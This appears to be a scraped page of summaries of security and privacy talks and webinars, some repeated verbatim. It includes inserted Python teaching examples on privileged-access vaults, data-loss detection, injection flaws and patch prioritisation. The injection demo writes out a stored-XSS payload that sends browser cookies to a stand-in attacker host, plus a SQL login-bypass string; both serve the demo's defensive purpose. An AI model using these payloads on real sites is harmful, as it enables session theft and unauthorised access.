This document discusses personally identifiable information (PII) and provides guidance on managing PII. It defines PII as information that can be used to identify an individual. The document notes that data breaches involving PII are common and outlines legal issues related to PII. It recommends assessing the confidentiality impact of PII and implementing appropriate controls based on the impact level. Specific steps are outlined to help organizations properly manage PII.
This webinar describes how you can manage the risk of privileged accounts being compromised, creating a breach of sensitive data or other assets in your organization, through privileged access management, or PAM. PAM can reduce risks by hardening your environment in ways no other solution can, but is challenging to deploy. This webinar provides an unbiased perspective on PAM capabilities, lessons learned and deployment challenges, distilling the good practices you need to be successful. It covers:
- PAM definitions, core features and specific security and compliance drivers
- The PAM market landscape and major vendors
- How to integrate PAM with identity management, service ticketing and monitoring
- Avoiding availability and performance issues
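As an added example, not code from the webinar or from any PAM vendor, the following Python sketch shows the credential "checkout" flow a PAM vault implements and the three integration points the list above names: an identity entitlement check, a service-ticket check, and an audit log that a monitoring pipeline would consume. The ticket table, entitlement table, account names and TTL are hypothetical values constructed for the demo.

```python
"""Added example (not from the webinar or any vendor): a minimal PAM-style
credential checkout with entitlement, ticket and audit integration.

Everything below is hypothetical: TICKETS, ENTITLEMENTS, the account names
and the TTL are constructed for the demonstration."""
import secrets
from dataclasses import dataclass, field

# Constructed ticket system: ticket id -> (requester, is_open)
TICKETS = {
    "INC-1001": ("alice", True),
    "INC-1002": ("bob", False),    # closed ticket: must not authorise access
    "INC-1003": ("bob", True),
}
# Constructed identity data: user -> privileged accounts they may check out
ENTITLEMENTS = {"alice": {"root@db01"}, "bob": {"root@db01", "admin@fw01"}}


@dataclass
class Checkout:
    account: str
    user: str
    ticket: str
    secret: str
    expires_at: float


@dataclass
class Vault:
    ttl_seconds: int = 3600
    passwords: dict = field(default_factory=dict)   # account -> current secret
    active: dict = field(default_factory=dict)      # account -> live Checkout
    audit: list = field(default_factory=list)       # append-only event log

    def enroll(self, account):
        """Bring an account under management: the vault sets a random secret."""
        self.passwords[account] = secrets.token_urlsafe(24)
        self.audit.append(("enroll", account, None, None))

    def checkout(self, user, account, ticket, now):
        if account not in self.passwords:
            raise KeyError(f"{account} is not vaulted")
        # Identity integration: the requester must be entitled to the account
        if account not in ENTITLEMENTS.get(user, set()):
            self.audit.append(("deny_entitlement", account, user, ticket))
            raise PermissionError(f"{user} is not entitled to {account}")
        # Ticketing integration: ticket must exist, be open and belong to the requester
        if TICKETS.get(ticket) != (user, True):
            self.audit.append(("deny_ticket", account, user, ticket))
            raise PermissionError(f"ticket {ticket} does not authorise {user}")
        # Exclusive use: one live checkout per account until check-in or expiry
        live = self.active.get(account)
        if live is not None and live.expires_at > now:
            self.audit.append(("deny_busy", account, user, ticket))
            raise RuntimeError(f"{account} is checked out by {live.user}")
        co = Checkout(account, user, ticket, self.passwords[account], now + self.ttl_seconds)
        self.active[account] = co
        self.audit.append(("checkout", account, user, ticket))
        return co

    def checkin(self, account):
        """Release the account and rotate its secret so the exposed value is dead."""
        co = self.active.pop(account, None)
        if co is None:
            return False
        self.passwords[account] = secrets.token_urlsafe(24)
        self.audit.append(("checkin_rotate", account, co.user, co.ticket))
        return True

    def expire(self, now):
        """Housekeeping: force check-in (and rotation) of anything past its TTL."""
        expired = [a for a, c in self.active.items() if c.expires_at <= now]
        for account in expired:
            self.checkin(account)
        return expired


def refused(vault, user, account, ticket, now):
    """True if the vault refuses the checkout (exercises the deny paths)."""
    try:
        vault.checkout(user, account, ticket, now)
        return False
    except (PermissionError, RuntimeError):
        return True


def demo():
    """Alice checks out root@db01 under an open ticket; the checkout lapses and
    the secret she saw is rotated. Returns (old_secret, new_secret, event_names)."""
    vault = Vault(ttl_seconds=600)
    vault.enroll("root@db01")
    old = vault.passwords["root@db01"]
    co = vault.checkout("alice", "root@db01", "INC-1001", now=1000.0)
    assert co.secret == old
    vault.expire(now=1000.0 + 601)
    return old, vault.passwords["root@db01"], [e[0] for e in vault.audit]


if __name__ == "__main__":
    old, new, events = demo()
    print("rotated:", old != new, "events:", events)
```

The availability point in the last bullet shows up here as the TTL: if the vault or its ticketing dependency is unreachable, nobody can check a secret out, so a real deployment needs a break-glass path that is itself logged and rotated afterwards.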
Shariyaz Abdeen data leakage prevention presentation (Shariyaz Abdeen)
This document discusses data loss prevention (DLP) systems and solutions. It outlines key challenges in securing confidential data, including identifying where data is stored and located, monitoring where data is going, and enforcing data security policies. The document compares several DLP vendors and their solutions for discovering and protecting data at rest and in motion. It also provides examples of common data security incidents and evaluates risks to prioritize data types for protection. Overall the document promotes DLP systems as an important tool for securing organizations' confidential and regulated data.
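An added example, not from this presentation or from any DLP vendor, of the discover, monitor and protect cycle the summary describes: content detectors run over outbound records, findings are weighted so the riskiest data types are prioritised, and a record that crosses the threshold is blocked and redacted. The detectors, severity weights, block threshold and sample records are all assumptions constructed for the demo; the card number is a well-known test number, not a real account.

```python
"""Added example (not from the presentation): DLP-style content detection
over constructed sample records. Patterns, weights, threshold and data are
assumptions made for the demonstration."""
import re

# US SSN shape, rejecting the reserved area/group/serial values
SSN_RE = re.compile(r"\b(?!000|666|9\d\d)\d{3}-(?!00)\d{2}-(?!0000)\d{4}\b")
# 13-19 digits with optional space/hyphen separators; Luhn filters false positives
PAN_RE = re.compile(r"\b(?:\d[ -]?){12,18}\d\b")
EMAIL_RE = re.compile(r"\b[\w.+-]+@[\w-]+(?:\.[\w-]+)+\b")

# Severity weights: which data types get protected first
WEIGHTS = {"ssn": 10, "pan": 10, "email": 1}


def luhn_ok(digits):
    """Luhn checksum as used by payment card numbers (digits: str of 0-9)."""
    total, parity = 0, len(digits) % 2
    for i, ch in enumerate(digits):
        d = int(ch)
        if i % 2 == parity:
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


def find_pii(text):
    """Discover: return (kind, matched_text) findings in one record."""
    findings = [("ssn", m.group()) for m in SSN_RE.finditer(text)]
    for m in PAN_RE.finditer(text):
        digits = re.sub(r"[ -]", "", m.group())
        if 13 <= len(digits) <= 19 and luhn_ok(digits):
            findings.append(("pan", m.group()))
    findings += [("email", m.group()) for m in EMAIL_RE.finditer(text)]
    return findings


def score(findings):
    return sum(WEIGHTS[kind] for kind, _ in findings)


def redact(text, findings):
    """Protect: mask each finding, keeping the last four characters of SSN/PAN."""
    for kind, value in findings:
        if kind in ("ssn", "pan"):
            mask = "*" * (len(value) - 4) + value[-4:]
        else:
            mask = "[email redacted]"
        text = text.replace(value, mask)
    return text


def classify(record, block_threshold=10):
    """Monitor: policy decision for one outbound record."""
    findings = find_pii(record)
    s = score(findings)
    return {
        "action": "block" if s >= block_threshold else "allow",
        "score": s,
        "findings": findings,
        "redacted": redact(record, findings),
    }


# Constructed sample records; 4111 1111 1111 1111 is a standard test PAN
SAMPLES = [
    "Customer J. Doe, SSN 123-45-6789, card 4111 1111 1111 1111, j.doe@example.com",
    "Order #4023 shipped; tracking 1234567890123456; contact ops@example.com",
    "Meeting notes: nothing sensitive here",
]

if __name__ == "__main__":
    for rec in SAMPLES:
        r = classify(rec)
        print(r["action"], r["score"], r["redacted"])
```

The tracking number in the second record is 16 digits but fails the Luhn check, so it is not reported as a card number; that is the difference between a pattern match and a content detector with an acceptable false-positive rate.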
Regulatory frameworks like HIPAA, HITECH, and Meaningful Use establish standards for protecting patient health information and incentivizing adoption of electronic health records. Security frameworks such as NIST and ISO provide best practices for information security controls. Recent case studies show common HIPAA violations include unencrypted devices, email phishing, and improper access controls. Current topics in healthcare cybersecurity include implementing the basics of risk assessment, policies, and technical controls; evaluating risks from business partners; and protecting against ransomware through regular patching and backups.
Being aware of the trends that are expected to shape the digital landscape is an important step in ensuring the security of your data and online assets.
Amongst others, the webinar covers:
• Top Cyber Trends for 2023
• Cyber Insurance
• Prioritization of Cyber Risk
Presenters:
Colleen Lennox
Colleen Lennox is the Founder of Cyber Job Central, a newly formed job board dedicated to Cybersecurity job openings. Colleen has 25+ years in Technical Recruiting and loves to help others find their next great job!
Madhu Maganti
Madhu is a goal-oriented cybersecurity/IT advisory leader with more than 20 years of comprehensive experience leading high-performance teams with a proven track record of continuous improvement toward objectives. He is highly knowledgeable in both technical and business principles and processes.
Madhu specializes in cybersecurity risk assessments, enterprise risk management, regulatory compliance, Sarbanes-Oxley (SOX) compliance and system and organization controls (SOC) reporting.
Date: January 25, 2023
Tags: ISO, ISO/IEC 27032, Cybersecurity Management
-------------------------------------------------------------------------------
Find out more about ISO training and certification services
Training: https://pecb.com/en/education-and-certification-for-individuals/iso-iec-27032
https://pecb.com/article/cybersecurity-risk-assessment
https://pecb.com/article/a-deeper-understanding-of-cybersecurity
Webinars: https://pecb.com/webinars
Article: https://pecb.com/article
Whitepaper: https://pecb.com/whitepaper
-------------------------------------------------------------------------------
For more information about PECB:
Website: https://pecb.com/
LinkedIn: https://www.linkedin.com/company/pecb/
Facebook: https://www.facebook.com/PECBInternational/
Slideshare: http://www.slideshare.net/PECBCERTIFICATION
YouTube video: https://youtu.be/BAAl_PI9uRc
The document discusses information security and its importance. It defines information and information security, and outlines threats like different types of attacks. It explains the three principles of information security - confidentiality, integrity, and availability. It also discusses security across different aspects like data security, computer security and network security. The document emphasizes that information is a valuable asset for organizations that needs suitable protection.
CIA Triad in Data Governance, Information Security, and Privacy: Its Role and... (PECB)
According to Technavio's market research report, the data security market is forecast to grow by USD 2.85 billion during 2021-2025.
To secure their data, organizations can use the CIA triad (confidentiality, integrity, availability), a security model that gives a common vocabulary for the different parts of IT security.
The webinar covers
• Overview Of CIA
• Description of Data Governance vs Information Security vs Privacy
• Relationship of CIA to Data Governance
• Relationship of CIA to Information Security
• Relationship of CIA to Privacy
• How to Implement and Maintain the CIA model (e.g., PDCA, etc.)
Presenters:
Anthony English
Our presenter for this webinar is Anthony English, one of the top cybersecurity professionals in Atlantic Canada with extensive Canadian and International experience in cybersecurity covering risk assessment, management, mitigation, security testing, business continuity, information security management systems, architecture security reviews, project security, security awareness, lectures, presentations and standards-based compliance.
Date: November 17, 2021
-------------------------------------------------------------------------------
Find out more about ISO training and certification services
Training: https://pecb.com/whitepaper/iso-27001-information-technology--security-techniques-information-security--management-systems---requirements
https://pecb.com/en/education-and-certification-for-individuals/iso-iec-27701
Webinars: https://pecb.com/webinars
Articles: https://pecb.com/article
Whitepapers: https://pecb.com/whitepaper
-------------------------------------------------------------------------------
For more information about PECB:
Website: https://pecb.com/
LinkedIn: https://www.linkedin.com/company/pecb/
Facebook: https://www.facebook.com/PECBInternational/
Slideshare: http://www.slideshare.net/PECBCERTIFICATION
YouTube video: https://youtu.be/eA8uQhdLZpw
This document summarizes a security awareness training presentation that covered topics such as why security training is important, 21st century security threats, PCI compliance, security objectives and challenges, data classification, and security responsibilities. It provided examples of security incidents, the costs of data breaches, PCI DSS requirements, and outlined the company's security framework including defenses, controls, and challenges around excessive data retention, vulnerable infrastructure, lack of documentation and logging.
The document discusses the NIST Cybersecurity Framework, which provides guidelines for critical infrastructure security and management of cybersecurity risks. It was created through a collaboration between government and industry to help organizations manage and reduce cybersecurity risks. The framework consists of five concurrent and continuous functions - Identify, Protect, Detect, Respond, Recover. It also outlines implementation tiers from Partial to Adaptive to help organizations characterize their cybersecurity risk management practices. The framework is meant to be flexible and not prescriptive in order to accommodate different sectors and risk profiles.
This document provides an overview and agenda for a Data Loss Prevention presentation. It discusses trends in data loss, how DLP works to discover, monitor and protect data, and case studies of how DLP helps different types of insider and outsider threats. It highlights the advantages of the Symantec DLP solution, including its accuracy, sophisticated workflow for incident response, ability to identify sensitive data with Data Insight, and zero-day content detection through machine learning. The appendix discusses Symantec's leadership in the DLP market and new features of the latest DLP product version.
This document provides an overview of cybersecurity training for Windstone Health Services employees in 2021. It defines cybersecurity and why it is important, discusses common cybersecurity threats like malware, phishing, and denial of service attacks. It also outlines responsibilities for both employees and the company, including maintaining secure passwords, updating software, and employing firewalls and encryption. The overall message is that cyberattacks are a serious risk and all entities must work together to protect systems, be wary of suspicious activities, and keep security protocols up to date.
Cyber Security 101: Training, awareness, strategies for small to medium sized... (Stephen Cobb)
I developed "Cyber Security 101: Training, awareness, strategies for small to medium sized business" for the second annual Small Business Summit on Security, Privacy, and Trust, co-hosted by ADP in New Jersey, October 2013.
Cyber Security Layers - Defense in Depth
7P's, 2D's & 1 N
People
Process
Perimeter
Physical
Points (End)
Network
Platform
Programs (Apps)
Database
Data
This document discusses the importance of protecting sensitive data and minimizing exposure. It defines sensitive data as information that must be safeguarded from unauthorized access, such as passwords, addresses, social security numbers, and credit card information. The document outlines laws and regulations that govern sensitive data protection and explains how data is often exposed through security flaws, intrusions, phishing, or social engineering. It recommends encrypting sensitive data, restricting access to authorized individuals only, and learning from past security incidents to strengthen protections.
This document is a summary of a webinar on cyber security and digital safety. It discusses various types of hackers, defines cyber crimes, and covers topics like social media security, mental health and cyber security, and how to protect websites from hacking. It describes career scope in the cyber security field and lists some dedicated cyber security companies in Nepal. The webinar aims to educate ordinary users on navigating cyberspace safely.
This document discusses various threats to information security and the safeguards organizations can implement. The three main sources of threats are human error, malicious human activity, and natural disasters. Key threats include hacking, viruses, and unauthorized data disclosure through actions like phishing. Technical safeguards include identification and authentication (such as passwords), encryption, firewalls, and malware protection. Human safeguards involve policies, training, account management, and monitoring. Senior management must establish security policies, assess risks, and ensure all necessary safeguards are in place to protect the organization's information systems and data. The organization should also have an incident response plan to deal with security breaches when they do occur.
This presentation shows customers how IBM Security products and services help clients transform their security program, orchestrate their defenses throughout the attack lifecycle, and protect their most critical information and risks.
Cybersecurity Incident Management Powerpoint Presentation Slides are designed for information technology experts. Our data security PowerPoint theme combines high-quality design with info accumulated by industry experts. Represent the present situation of the target organization’s information security management using our patterned PPT slideshow. The innovative data visualizations aid in compiling data such as the analysis of the current IT department with considerable convenience. Communicate the cybersecurity framework roadmap and kinds of cyber threats with the help of this PowerPoint layout. Demonstrate the cybersecurity risk management action plan through the tabular format included in this PPT presentation. Illustrate the cybersecurity contingency plan. Our information security management system PowerPoint templates deck helps you in defining risk handling responsibilities of your personnel. Elucidate the role of the management in successful information security governance. Our PPT deck also outlines the costs involved in cybersecurity management and staff training. Showcase an impact analysis with a dash of visual brilliance. Smash the download button and start designing. Our Cybersecurity Incident Management Powerpoint Presentation Slides are topically designed to provide an attractive backdrop to any subject. Use them to look like a presentation pro. https://bit.ly/3zWo1hb
The document discusses various security threats that exist on social networks, including phishing attacks, vulnerabilities in third-party applications, weak password security, cross-site scripting attacks, clickjacking, insecure frameworks, SQL injection, and DDoS attacks. It provides examples of each type of attack, such as phishing links that install malware, third-party apps that expose too much user data if compromised, passwords that are easily guessed, malicious JavaScript injected through photo tags, and privacy settings exploited to view other profiles. The document emphasizes that with over a billion users exchanging personal information, social networks face many potential threats, but that Facebook invests heavily in securing its own systems.
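Two of the attacks listed above, SQL injection and stored cross-site scripting, as an added example that is not part of the summarized presentation or of any social network's code: a string-built login query and an unescaped profile render are shown next to their hardened forms against an in-memory SQLite database. The schema, user rows and attacker payloads are constructed for the demo.

```python
"""Added example (not from the document): SQL injection and stored XSS,
vulnerable form beside the hardened form, on constructed data."""
import html
import sqlite3


def make_db():
    """Constructed users table; bob's bio carries a stored-XSS payload."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (name TEXT, password TEXT, bio TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?)", [
        ("alice", "correct-horse", "likes hiking"),
        ("bob", "hunter2",
         "<script>document.location='http://evil.example/?c='+document.cookie</script>"),
    ])
    return db


def login_vulnerable(db, name, password):
    """String-built SQL: attacker-controlled quotes change the query's logic."""
    q = f"SELECT name FROM users WHERE name = '{name}' AND password = '{password}'"
    return [row[0] for row in db.execute(q)]


def login_safe(db, name, password):
    """Parameterised SQL: input is bound as data and never parsed as SQL."""
    q = "SELECT name FROM users WHERE name = ? AND password = ?"
    return [row[0] for row in db.execute(q, (name, password))]


def render_bio_vulnerable(db, name):
    """Stored XSS: the bio is interpolated into HTML unescaped."""
    (bio,) = db.execute("SELECT bio FROM users WHERE name = ?", (name,)).fetchone()
    return f"<p>{bio}</p>"


def render_bio_safe(db, name):
    """Output encoding: the same bio is escaped so the browser treats it as text."""
    (bio,) = db.execute("SELECT bio FROM users WHERE name = ?", (name,)).fetchone()
    return f"<p>{html.escape(bio, quote=True)}</p>"


# Constructed attacker input: the SQL comment '--' removes the password check
SQLI_NAME = "alice' --"
SQLI_PASSWORD = "anything"

if __name__ == "__main__":
    db = make_db()
    print("vulnerable login:", login_vulnerable(db, SQLI_NAME, SQLI_PASSWORD))
    print("safe login:      ", login_safe(db, SQLI_NAME, SQLI_PASSWORD))
    print(render_bio_safe(db, "bob"))
```

The fix for each case is the same principle: keep data out of the interpreter's grammar, by binding parameters for SQL and by encoding for the HTML context on output (a real application would also set a Content-Security-Policy and HttpOnly cookies to limit what a surviving script can do).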
VAPT (Vulnerability Assessment and Penetration Testing) involves evaluating systems and networks to identify vulnerabilities, configuration issues, and potential routes of unauthorized access. It is recommended for SMEs due to common security issues like phishing and ransomware attacks targeting them. The document outlines the types of VAPT testing, why SMEs need it, example data breaches, and estimated costs of common cyber attacks and security services.
Information Security vs. Data Governance vs. Data Protection: What Is the Rea... (PECB)
This webinar will provide more information on the importance of information security and how you can take security well beyond compliance, an approach on building strong information security, privacy and data governance programs, and the importance of strong data governance in relation to privacy and information security requirements.
The webinar covers
• Information Security
• Importance Of Information Security Today
• Taking Information Security Beyond A Compliance First
• Importance Of Data Governance In Information Security
• Privacy
• Changing And Evolving Privacy Requirements
• Importance Of Data Governance In Privacy
• Data Governance And Data Privacy
• Data Privacy - Data Processing Principles
Presenters:
Moji is a Senior Business Process Analyst working with Gemalto (Thales), a leading firm in the IT industry. Moji has over fifteen years of experience leading projects to improve processes, create and implement processes that increase revenue generation, and eliminate redundancies.
She has a zeal for adding value and increasing revenue for organizations. Moji is very passionate about Data Privacy and its application in business and consumer rights.
Hardeep Mehrotara has 20+ years of senior leadership experience in Information Technology and Cyber Security working for public and private organizations building security programs from the ground up. He has been featured on Canadian television as a cyber expert and provided advice to various communities on implementing cybersecurity strategy, best practices and controls. He has been a co-author on numerous leading industry security control frameworks, technical benchmarks and industry best practice standards.
-------------------------------------------------------------------------------
Find out more about ISO training and certification services
Training: https://pecb.com/whitepaper/iso-27001-information-technology--security-techniques-information-security--management-systems---requirements
https://pecb.com/en/education-and-certification-for-individuals/iso-iec-27701
Webinars: https://pecb.com/webinars
Articles: https://pecb.com/article
Whitepapers: https://pecb.com/whitepaper
-------------------------------------------------------------------------------
For more information about PECB:
Website: https://pecb.com/
LinkedIn: https://www.linkedin.com/company/pecb/
Facebook: https://www.facebook.com/PECBInternational/
Slideshare: http://www.slideshare.net/PECBCERTIFICATION
YouTube video: https://youtu.be/aQcS5-RFIEY
The “Privacy Today” presentation was written for the IAPP by Professor Peter Swire of the Moritz College of Law of the Ohio State University. The materials cover the definition of privacy, ways to protect privacy, privacy harms, and fair information practices. The “Privacy Today” presentation is designed for college and university students.
Licensed under Creative Commons Attribution 3.0 Unported
All the essential information you need about DLP in one eBook.
As security professionals struggle with how to keep up with threats, DLP - a technology designed to ensure sensitive data isn't stolen or lost - is hot again. This comprehensive guide provides what you need to understand, evaluate, and succeed with today's DLP. It includes insights from DLP Experts, Forrester Research, Gartner, and Digital Guardian's security analysts.
What's Inside:
-The seven trends that have made DLP hot again
-How to determine the right approach for your organization
-Making the business case to executives
-How to build an RFP and evaluate vendors
-How to start with a clearly defined quick win
-Straight-forward frameworks for success
Secrets to managing your Duty of Care in an ever-changing world.
How well do you know your risks?
Are you keeping up with your responsibilities to provide Duty of Care?
How well are you prioritising Cybersecurity initiatives?
Liability for Cybersecurity attacks sits with Executives and Board members, who may not have the right level of technical security knowledge. This session will outline the practical steps executives can take to implement a Cybersecurity Roadmap that is aligned with the organization's strategic objectives.
Led by Krist Davood, who has spent over 28 years implementing secure mission critical systems for executives. Krist is an expert in protecting the interconnectedness of technology, intellectual property and information systems, as evidenced through his roles at The Good Guys, Court Services Victoria and Schiavello.
The seminar will cover:
• Fiduciary responsibility
• How to efficiently deal with personal liability and the threat of court action
• The role of a Cybersecurity Executive Dashboard and its ability to simplify risk and amplify informed decision making
• How to identify and bridge the gap between your Cybersecurity Compliance Rating and the threat of court action
This document discusses patch and vulnerability management. It begins with an agenda that covers why patch management matters, its relationship to risk management and penetration testing, how to implement patch and vulnerability management, establish metrics, plan ahead, and draw conclusions. It then discusses key aspects of patch and vulnerability management including monitoring vulnerabilities, establishing priorities, managing knowledge of vulnerabilities and patches, testing patches, implementing patches, verifying implementation, and improving the process. The goal is to reduce risk by addressing vulnerabilities through a structured patch management program.
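The "establish priorities" and "verify implementation" steps above, as an added example that is not the document's own method: a risk-based ranking that combines CVSS with exploitation evidence and asset exposure, an SLA derived from the ranking, and a post-deployment check that compares installed versions against the fixed version. The vulnerability feed, asset inventory, score weights and SLA bands are hypothetical values constructed for the demo; the identifiers are made up, not real CVEs.

```python
"""Added example (not from the document): patch prioritisation and
verification over a constructed vulnerability feed and asset inventory.
Weights, SLA bands, packages, versions and identifiers are assumptions."""
from dataclasses import dataclass


@dataclass(frozen=True)
class Vuln:
    vuln_id: str
    package: str
    fixed_version: str   # first version that contains the fix
    cvss: float
    exploited: bool      # exploitation in the wild is known


@dataclass
class Host:
    name: str
    internet_facing: bool
    packages: dict       # package -> installed version string


def version_tuple(v):
    """'1.2.10' -> (1, 2, 10); string comparison would rank 1.2.9 above it."""
    return tuple(int(part) for part in v.split("."))


def is_vulnerable(host, vuln):
    installed = host.packages.get(vuln.package)
    if installed is None:
        return False
    return version_tuple(installed) < version_tuple(vuln.fixed_version)


def priority(host, vuln):
    """Risk-based ranking: exploitation evidence and exposure outweigh raw CVSS."""
    score = vuln.cvss
    if vuln.exploited:
        score += 5
    if host.internet_facing:
        score += 3
    return score


def sla_days(score):
    """Remediation deadline derived from the priority score (assumed bands)."""
    if score >= 14:
        return 2
    if score >= 9:
        return 7
    if score >= 5:
        return 30
    return 90


def plan(hosts, vulns):
    """Work items (host, vuln_id, score, sla_days), highest risk first."""
    items = []
    for h in hosts:
        for v in vulns:
            if is_vulnerable(h, v):
                s = priority(h, v)
                items.append((h.name, v.vuln_id, s, sla_days(s)))
    return sorted(items, key=lambda item: (-item[2], item[0], item[1]))


def verify(hosts_after, vulns):
    """Post-patch check: anything still vulnerable is a failed or missed deployment."""
    return [(h.name, v.vuln_id) for h in hosts_after for v in vulns if is_vulnerable(h, v)]


# Constructed feed and inventory (identifiers are made up, not real CVEs)
VULNS = [
    Vuln("VULN-A", "openssl", "3.0.12", 7.5, True),
    Vuln("VULN-B", "nginx", "1.25.3", 5.3, False),
    Vuln("VULN-C", "openssl", "3.0.10", 9.8, False),
]
BEFORE = [
    Host("web01", True, {"openssl": "3.0.9", "nginx": "1.25.2"}),
    Host("db01", False, {"openssl": "3.0.11"}),
]
AFTER = [   # db01 was missed by the rollout and is still on 3.0.11
    Host("web01", True, {"openssl": "3.0.12", "nginx": "1.25.3"}),
    Host("db01", False, {"openssl": "3.0.11"}),
]

if __name__ == "__main__":
    for item in plan(BEFORE, VULNS):
        print(item)
    print("still vulnerable after rollout:", verify(AFTER, VULNS))
```

Note that VULN-A (CVSS 7.5, exploited) outranks VULN-C (CVSS 9.8, not exploited) on the same host: that is the point of the step the document calls establishing priorities, and it is what the metrics step should measure against (time to close by priority band, not raw patch counts).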
This document provides an overview of network security concepts. It discusses the importance of protecting information assets as the most valuable company assets. It then covers key network security topics like the CIA triad of confidentiality, integrity and availability. It defines threats at both the network and application levels, and discusses how to overcome threats through policies, user awareness training, and security technologies like firewalls, IDS/IPS, antivirus software, VPNs, spam filters and web content filtering. The document aims to educate about network threats and appropriate security controls and protections.
A continuing legal education program on the privacy issues in transactions including credit applications and issuance, asset purchases, mergers and acquisitions, marketing and advertising and bankruptcy, given on May 21, 2013 by Jonathan I. Ezor at Olshan Frome Wolosky in New York City.
Halt & Catch Fire: Is PII No Longer the Third-Rail of Digital Privacy? (iMedia Connection)
This document discusses personally identifiable information (PII) and how the digital advertising landscape has changed in recent years. It notes that PII rules were established 15 years ago but the market is now very different, with platforms merging PII data with ad serving data and using PII for targeting. It suggests that regulating PII and connecting different data silos, including for internet of things devices, is an important issue. It concludes that advertising technology companies should reconsider how they can appropriately leverage PII given these changes.
The document discusses various security threats that exist on social networks, including phishing attacks, vulnerabilities in third-party applications, weak password security, cross-site scripting attacks, clickjacking, insecure frameworks, SQL injections, and DDOS attacks. It provides examples of each type of attack, such as phishing links that install malware, apps that access too much user data if hacked, passwords being easily guessed, malicious JavaScript that can be installed through photo tags, and privacy settings being exploited to view other profiles. The document emphasizes that with over a billion users exchanging personal information, social networks face many potential threats but that Facebook focuses heavily on security to prevent hacks of its own system.
VAPT (Vulnerability Assessment and Penetration Testing) involves evaluating systems and networks to identify vulnerabilities, configuration issues, and potential routes of unauthorized access. It is recommended for SMEs due to common security issues like phishing and ransomware attacks targeting them. The document outlines the types of VAPT testing, why SMEs need it, example data breaches, and estimated costs of common cyber attacks and security services.
Information Security vs. Data Governance vs. Data Protection: What Is the Rea... (PECB)
This webinar will provide more information on the importance of information security and how you can take security well beyond compliance, an approach on building strong information security, privacy and data governance programs, and the importance of strong data governance in relation to privacy and information security requirements.
The webinar covers
• Information Security
• Importance Of Information Security Today
• Taking Information Security Beyond A Compliance First
• Importance Of Data Governance In Information Security
• Privacy
• Changing And Evolving Privacy Requirements
• Importance Of Data Governance In Privacy
• Data Governance And Data Privacy
• Data Privacy - Data Processing Principles
Presenters:
Moji is a Senior Business Process Analyst working with GemaltoThales, a leading firm in the IT industry. Moji has over fifteen years of experience in leading projects to improve processes, create and implement processes leading to increased revenue generation and eliminate redundancies.
She has a zeal for adding value and increasing revenue for organizations. Moji is very passionate about Data Privacy and its application in business and consumer rights.
Hardeep Mehrotara has 20+ years of senior leadership experience in Information Technology and Cyber Security working for public and private organizations building security programs from the ground up. He has been featured on Canadian television as a cyber expert and provided advice to various communities on implementing cybersecurity strategy, best practices and controls. He has been a co-author on numerous leading industry security control frameworks, technical benchmarks and industry best practice standards.
-------------------------------------------------------------------------------
Find out more about ISO training and certification services
Training: https://pecb.com/whitepaper/iso-27001-information-technology--security-techniques-information-security--management-systems---requirements
https://pecb.com/en/education-and-certification-for-individuals/iso-iec-27701
Webinars: https://pecb.com/webinars
Articles: https://pecb.com/article
Whitepapers: https://pecb.com/whitepaper
-------------------------------------------------------------------------------
For more information about PECB:
Website: https://pecb.com/
LinkedIn: https://www.linkedin.com/company/pecb/
Facebook: https://www.facebook.com/PECBInternational/
Slideshare: http://www.slideshare.net/PECBCERTIFICATION
YouTube video: https://youtu.be/aQcS5-RFIEY
Website link: https://pecb.com/
The “Privacy Today” presentation was written for the IAPP by Professor Peter Swire of the Moritz College of Law of the Ohio State University. The materials cover the definition of privacy, ways to protect privacy, privacy harms, and fair information practices. The “Privacy Today” presentation is designed for college and university students.
Licensed under Creative Commons Attribution 3.0 Unported
All the essential information you need about DLP in one eBook.
As security professionals struggle with how to keep up with threats, DLP - a technology designed to ensure sensitive data isn't stolen or lost - is hot again. This comprehensive guide provides what you need to understand, evaluate, and succeed with today's DLP. It includes insights from DLP Experts, Forrester Research, Gartner, and Digital Guardian's security analysts.
What's Inside:
-The seven trends that have made DLP hot again
-How to determine the right approach for your organization
-Making the business case to executives
-How to build an RFP and evaluate vendors
-How to start with a clearly defined quick win
-Straight-forward frameworks for success
Secrets to managing your Duty of Care in an ever- changing world.
How well do you know your risks?
Are you keeping up with your responsibilities to provide Duty of Care?
How well are you prioritising Cybersecurity initiatives?
Liability for cybersecurity attacks sits with executives and board members who may not have the right level of technical security knowledge. This session will outline the practical steps executives can take to implement a cybersecurity roadmap that is aligned with the organization's strategic objectives.
Led by Krist Davood, who has spent over 28 years implementing secure mission critical systems for executives. Krist is an expert in protecting the interconnectedness of technology, intellectual property and information systems, as evidenced through his roles at The Good Guys, Court Services Victoria and Schiavello.
The seminar will cover:
• Fiduciary responsibility
• How to efficiently deal with personal liability and the threat of court action
• The role of a Cybersecurity Executive Dashboard and its ability to simplify risk and amplify informed decision making
• How to identify and bridge the gap between your Cybersecurity Compliance Rating and the threat of court action
This document discusses patch and vulnerability management. It begins with an agenda that covers why patch management matters, its relationship to risk management and penetration testing, how to implement patch and vulnerability management, establish metrics, plan ahead, and draw conclusions. It then discusses key aspects of patch and vulnerability management including monitoring vulnerabilities, establishing priorities, managing knowledge of vulnerabilities and patches, testing patches, implementing patches, verifying implementation, and improving the process. The goal is to reduce risk by addressing vulnerabilities through a structured patch management program.
This document provides an overview of network security concepts. It discusses the importance of protecting information assets as the most valuable company assets. It then covers key network security topics like the CIA triad of confidentiality, integrity and availability. It defines threats at both the network and application levels, and discusses how to overcome threats through policies, user awareness training, and security technologies like firewalls, IDS/IPS, antivirus software, VPNs, spam filters and web content filtering. The document aims to educate about network threats and appropriate security controls and protections.
A continuing legal education program on the privacy issues in transactions including credit applications and issuance, asset purchases, mergers and acquisitions, marketing and advertising and bankruptcy, given on May 21, 2013 by Jonathan I. Ezor at Olshan Frome Wolosky in New York City.
Halt & Catch Fire: Is PII No Longer the Third-Rail of Digital Privacy? (iMedia Connection)
This document discusses personally identifiable information (PII) and how the digital advertising landscape has changed in recent years. It notes that PII rules were established 15 years ago but the market is now very different, with platforms merging PII data with ad serving data and using PII for targeting. It suggests that regulating PII and connecting different data silos, including for internet of things devices, is an important issue. It concludes that advertising technology companies should reconsider how they can appropriately leverage PII given these changes.
The document discusses various definitions of identity and how identity is formed and influenced. It addresses the nature vs nurture debate on whether identity is innate or acquired. Key points made include:
- Identity can refer to characteristics that define one as a member of a group, the quality of being the same as something else, or one's individual personality.
- Young people's identities are influenced by the media images they are exposed to through technology like TVs and the internet. This exposure can shape their behavior, interests and sense of self.
